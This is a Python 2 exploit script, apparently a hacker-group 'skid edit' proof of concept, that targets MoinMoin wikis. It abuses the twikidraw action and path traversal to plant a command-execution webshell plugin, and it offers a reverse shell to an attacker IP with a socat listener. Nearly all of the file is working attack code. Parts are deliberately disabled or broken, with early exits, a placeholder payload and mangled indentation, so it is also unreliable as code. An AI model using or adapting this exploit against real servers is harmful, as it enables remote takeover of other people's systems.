#!/usr/bin/env python
# -*- coding: utf-8 -*-

ascii = '\x1b[1;31m'##
ascii +='    \r\n'#
ascii +=' ██████████    ██████   ███  ███  ██    ██████████   ████████  ███  ███████ \r\n'#
ascii +=' ███████████  ████████  ███  ████ ███    ███████████  ████████  ███  ███████ \r\n'#
ascii +=' ██▒ ██▒ ██▒  ██▒  ███  ██▒  ██▒█▒███    ██▒ ██▒ ██▒  ██▒  ██▒  ██▒   \r\n'#
ascii +=' ▒█▒ ▒█▒ ▒█▒  ▒█▒  █▒█  ▒█▒  ▒█▒▒█▒█▒    ▒█▒ ▒█▒ ▒█▒  ▒█▒  ▒█▒  ▒█▒   \r\n'#
ascii +=' █▒▒ ▒▒█ █▒█  █▒█  ▒█▒  ▒▒█  █▒█ ▒▒█▒    █▒▒ ▒▒█ █▒█  █▒▒▒░▒    █▒▒  █▒▒   \r\n'#
ascii +=' ▒█▒   ▒ ▒█▒  ▒█▒  ▒▒▒  ▒▒▒  ▒█▒  ▒▒▒    ▒█▒   ▒ ▒█▒  ▒▒▒▒▒░    ▒▒▒  ▒▒▒   \r\n'#
ascii +=' ▒▒░  ▒▒░  ▒▒░  ▒▒▒  ▒▒░  ▒▒░  ▒▒▒    ▒▒░  ▒▒░  ▒▒░  ▒▒░  ▒▒░   \r\n'#
ascii +=' ░▒░  ░▒░  ░▒░  ▒░▒  ░▒░  ░▒░  ▒░▒    ░▒░  ░▒░  ░▒░  ░▒░  ░▒░   \r\n'#
ascii +=' ░░░  ░░   ░░░░░ ░░   ░░   ░░   ░░    ░░░  ░░    ░░ ░░░░   ░░ ░░░░   ░░   \r\n'#
ascii +='  ░  ░  ░ ░  ░   ░    ░░    ░  ░  ░    ░ ░░ ░░   ░ ░░ ░ ░   ░    \r\n'#
ascii +='    \r\n'#
ascii +='   ~[ PoC v3 : Remote arbitrary command execution for MoinMoin (skid edit) ]~   \r\n'#
ascii +='\x1b[0m'##

# cr3dz: [HTP]XiX, xo, [HTP]Starfall, Unnamed, [HTP]RyanC

import requests, re, getpass, random

print ascii
print "[*] Now with", random.choice(["hookers",
     "SYN floods",
     "integrated LOIC",
     "a bullshit Reason Generator",
     "UDP floods",
     "an admin informer",
     "a backdoor",
     "automatic defacing",
     "Full Disclosure letters",
     "advertisements",
     "an End-User License Agreement",
     "a 30-day Trial",
     "a free AOL subscription",
     "more educational value",
     "famewhoring",
     "Havij support",
     "advice from Sabu",
     "incomprehensible commentary",
     "hacker apparel",
     "advice from Kevin Mitnick",
     "a Unity applet",
     "JUSTICE",
     "FreeNode support",
     "advice from Chippy1337"]) + "!"

target = raw_input("[*] Target site? ").replace("http://","").replace("FrontPage","").replace("WikiSandBox","")
print "[*] Method of execution:"
print "[1] Stealth webshell, available upon Apache restart"
print "[2] Backconnect shell, available immediately (RISKY)"
print "[3] Exit"
method = raw_input("> ")

if method=='3':
    exit()
elif method=='2':
    print "[*] Preparing exploit.."
    print "rmed from crippled edition, exiting"
    exit()
elif method=='1':
    print "[*] Preparing exploit.."
    filename = "drawing.r if()else[]\nimport os\ndef execute(p,r):exec\"print>>r,os\\56popen(r\\56values['c'])\\56read()\""
    data = "MoinMoin error\n"
else:
    print "[-] \x1b[0;31mInvalid method\x1b[0m"
    exit()

print "[*] Checking permissions on WikiSandBox page.."
username=None
password=None
authorizationcookie=None
jar=None
permission_check = requests.get("http://%s/WikiSandBox" % target).text
if "Edit (Text)" in permission_check:
    print "[+] No security"
    check = True
elif "Immutable Page" in permission_check:
    print "[-] Authorization required"
    check = False
else:
    print "[-] \x1b[0;31mCould not identify editable page!\x1b[0m"
    print "[-] Authorization required"
    check = False
if not check:
    have_acc = raw_input("[*] Do you have an account? [Y/N] ").lower()
    if have_acc.startswith("y"):
  username = raw_input("[*] Username: ")
  password = getpass.getpass("[*] Password: ")
    else:
  print "[-] \x1b[0;31mCreate an account and restart the exploitation process\x1b[0m"
  print "[-] http://%s/?action=newaccount" % target
    url = "http://%s/" % target
    print "[*] Logging in"
    signon = {'action':'login','name':username,'password':password,'login':'Login'}
    jar = requests.post(url, data=signon).cookies
    for cookie in jar.values():
  if len(cookie)==40:
    authorizationcookie=cookie
    if not authorizationcookie:
  print "[-] \x1b[0;31mLogin failed\x1b[0m"
  exit()
    else:
  print "[+] Login succeeded"
    permission_check2 = requests.get("http://%s/WikiSandBox" % target).text
"""
    if "Edit (Text)" in permission_check2:
  print "[+] Successfully authorized to edit pages"
    elif "Immutable Page" in permission_check:
  print "[-] \x1b[0;31mFailed authorization check\x1b[0m"
  exit()
    else:
  print "[?] \x1b[0;33mLost track of environment.. continuing anyway\x1b[0m"
  exit()
"""

print "[*] Obtaining ticket credentials to write backdoor.."
if method == '1':
    ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../plugin/action/moinexec.py" % target, cookies=jar)
elif method == '2':
    ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../../moin.wsgi" % target, cookies=jar)
m = re.search('ticket=(.*?)&amp;target', ticket.text)
try:
    ticket_hash = m.group(1)
    print "[+] Extracted ticket hash from MoinMoin: %s" % (ticket_hash)
except:
    print "[-] \x1b[0;31mFailed to extract ticket hash from MoinMoin!\x1b[0m"
    exit()

print "[*] Sending payload.."
if method == '1':
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../plugin/action/moinexec.py" % (target, ticket_hash)
    b = []
    b.append("\r\n--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename))
    b.append("--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"")
    b.append("Content-Type: image/png\r\n")
    b.append(data)
    b.append("--89692781418184--")
    body = "\r\n".join(b)
    exit()
    headers = {}
    headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184'
    r = requests.post(url, cookies=jar, data=body, headers=headers)
    if(r.text == ""):
  print "[+] Exploit completed"
  print "[*] Upon Apache restart, your shell will be available at:"
  print "http://%s/WikiSandBox?action=moinexec&c=[command]" % target
    else:
  print "[-] \x1b[0;31mExploit failed\x1b[0m"
elif method == '2':
    print "[*] Backconnect options:"
    ip   = raw_input("[*] IP? ")
    port = raw_input("[*] Port? ")
    print "[*] To recieve your shell, login to %s and run: socat file:`tty`,raw,echo=0 tcp4-listen:%s" % (ip,port)
    raw_input("[*] Press enter to continue ")
    payload = "[MARK]exec \"%s\".decode(\"base64\")[MARK]\n" % data.replace("[IP]",ip).replace("[PORT]",port).encode("base64").replace("\n","")
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../../moin.wsgi" % (target, ticket_hash)
    b = []
    b.append("\r\n--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename))
    b.append("--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"")
    b.append("Content-Type: image/png\r\n")
    b.append(payload)
    b.append("--89692781418184--")
    body = "\r\n".join(b)
    headers = {}
    headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184'
    r = requests.post(url, cookies=jar, data=body, headers=headers)
    if(r.text == ""):
  print "[+] Payload file written"
    else:
  print "[-] \x1b[0;31mExploit failed\x1b[0m"
  exit()
    print "[*] Sending reverse shell"
    result = requests.get("http://%s/WikiSandBox?action=AttachFile" % target, cookies=jar).text
    if "Internal Server Error" in result or "Traceback" in result:
  print "[-] \x1b[0;31mSHIT\x1b[0m"
    else:
  print "[+] Shell sent successfully"

# American: How the fuck did you get in here?
# Lone Man: I used my imagination.